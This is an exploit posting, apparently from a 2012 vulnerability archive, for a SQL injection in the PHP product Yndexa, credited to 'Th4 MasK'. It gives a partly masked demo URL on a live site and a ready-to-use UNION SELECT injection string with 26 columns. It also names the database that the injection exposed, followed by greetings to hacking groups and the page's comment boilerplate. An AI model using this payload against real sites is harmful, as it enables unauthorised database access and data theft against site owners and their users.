YIndexa SQL Injection

2012.05.13

Credit: Th4 MasK

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

########################################################
~ Exploit Title   : Yndexa SQL Injecktion
~ Author         : Th4 MasK 
~ Vendor         : http://www.indexa.fr/
~ Date             : 12.05.2012 ~ 

~ Platform : Php ~
~ Test On  : BackTrack 5

//

~ Demo Site :

http://www.cfmxxils.com/formation_detail.php?id=11 [SQL]

Exploit ; 

http://www.cfmconxxeils.com/formation_detail.php?id=11+AND+1=2+UNION+SELECT+1,2
,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--

Database ; 

idep_cfmconseils


************************************************************** 
* Greetz:  ~ DarkDevilZ.iN  ~ SanalHarekat.Org
* Contact to ; th4_mask[at]windowslive.com 
* Darkness Devil,DeaDSLayeR,MuHuR,Evillord,Karatay 
*************************************************************   
 		 	   		  

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

YIndexa SQL Injection

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

YIndexa SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.